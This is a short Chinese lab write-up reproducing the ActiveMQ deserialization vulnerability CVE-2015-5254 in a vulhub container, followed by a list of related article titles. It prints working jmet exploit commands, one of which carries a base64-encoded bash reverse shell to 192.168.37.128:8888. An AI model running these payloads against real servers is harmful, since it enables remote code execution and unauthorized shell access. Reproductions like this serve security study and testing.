ActiveMQ 反序列化漏洞復現(CVE-2015-5254)
環境搭建
影響Apache ActiveMQ 5.13.0之前的版本
使用vulhub搭建環境,docker-compose up -d
環境搭建以後,開始監聽8161和61616兩個埠,其中8161是web管理端的埠,61616是工作埠。
復現過程
- 構造(可以使用ysoserial)可執行命令的序列化物件
- 作為一個訊息,傳送給目標61616埠
- 訪問web管理頁面,讀取訊息,觸發漏洞
生成序列化物件
使用jmt生成,在同目錄下建立一個external資料夾,不然可能報檔案不存在錯誤。
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME IP 61616
在伺服器中執行:docker-compose exec activemq bash,ls /tmp,發現success生成。
將生成的序列化物件中的payload變成反彈webshell的命令
使用base64編碼反彈shell命令在進行生成
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM3LjEyOC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME IP 61616
相關文章
- CVE-2015-5254漏洞復現
- 【漏洞復現】Shiro<=1.2.4反序列化漏洞
- Fastjson反序列化漏洞復現ASTJSON
- Fastjson1.2.24反序列化漏洞復現ASTJSON
- CVE-2016-7124反序列化漏洞復現
- Apache ActiveMQ任意檔案寫入漏洞(CVE-2016-3088)復現ApacheMQ
- Jboss反序列化漏洞復現(CVE-2017-12149)
- CVE-2017-12149 JBOOS反序列化漏洞復現
- CVE-2017-7504 JBOSS反序列化漏洞復現
- Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)復現Apache
- Apache漏洞復現Apache
- weblogic 漏洞復現Web
- phpStudy poc漏洞復現以及漏洞修復辦法PHP
- weblogic ssrf漏洞復現Web
- 笑臉漏洞復現
- Vulhub WebLogic漏洞復現Web
- Tomcat系列漏洞復現Tomcat
- 【阿菜漏洞復現】DeFi 平臺 MonoX Finance 漏洞分析及復現MonoNaN
- 網站安全防護-PHP反序列化漏洞修復網站PHP
- Weblogic-SSRF漏洞復現Web
- 護網漏洞復現(三)
- 修復weblogic的JAVA反序列化漏洞的多種方法WebJava
- Java序列化、反序列化、反序列化漏洞Java
- Redis未授權漏洞復現Redis
- CVE-2016-3088漏洞復現
- IIS短檔名漏洞復現
- nginx目錄穿越漏洞復現Nginx
- CVE2019-11043漏洞復現
- 【漏洞復現】Paraluni 安全事件分析事件
- cve-2020-1472 漏洞復現
- Weblogic核心元件反序列化漏洞修復方案(CVE-2020-14825)Web元件
- java 反序列化 cc1 復現Java
- java 反序列化 cc6 復現Java
- java 反序列化 cc7 復現Java
- python 反序列化漏洞Python
- php反序列化漏洞PHP
- fastjson反序列化漏洞ASTJSON
- JMX 反序列化漏洞